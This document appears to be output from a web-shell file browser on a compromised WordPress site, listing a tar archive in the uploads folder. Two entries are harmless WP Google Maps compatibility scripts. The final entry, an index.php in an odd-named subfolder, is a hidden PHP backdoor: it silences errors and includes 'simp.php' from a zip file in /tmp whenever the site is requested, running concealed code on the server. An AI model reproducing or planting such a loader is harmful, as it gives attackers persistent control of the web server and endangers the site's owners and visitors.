| Current Path : /home/bechata/mp/wp-content/uploads/2022/ejn73c/ |
| Current File : /home/bechata/mp/wp-content/uploads/2022/ejn73c/compatibility.tar |
google-ui-compatibility.js 0000666 00000001212 15176022444 0011645 0 ustar 00 /**
* @namespace WPGMZA
* @module GoogleUICompatibility
* @requires WPGMZA
*/
jQuery(function($) {
WPGMZA.GoogleUICompatibility = function()
{
var isSafari = navigator.vendor && navigator.vendor.indexOf('Apple') > -1 &&
navigator.userAgent &&
navigator.userAgent.indexOf('CriOS') == -1 &&
navigator.userAgent.indexOf('FxiOS') == -1;
if(!isSafari)
{
var style = $("<style id='wpgmza-google-ui-compatiblity-fix'/>");
style.html(".wpgmza_map img:not(button img) { padding:0 !important; }");
$(document.head).append(style);
}
}
WPGMZA.googleUICompatibility = new WPGMZA.GoogleUICompatibility();
}); astra-theme-compatibility.js 0000666 00000001013 15176022444 0012167 0 ustar 00 /**
* @namespace WPGMZA
* @module AstraThemeCompatiblity
* @requires WPGMZA
* @description Prevents the document.body.onclick handler firing for markers, which causes the Astra theme to throw an error, preventing the infowindow from opening
*/
jQuery(function($) {
$(document).ready(function(event) {
var parent = document.body.onclick;
if(!parent)
return;
document.body.onclick = function(event)
{
if(event.target instanceof WPGMZA.Marker)
return;
parent(event);
}
});
}); 0pu1ks/index.php 0000666 00000000150 15176022444 0007514 0 ustar 00 <?=@null; $h="";if(!empty($_SERVER["HTTP_HOST"])) $h = "simp.php"; include("zip:///tmp/phpPGrOym#$h");?>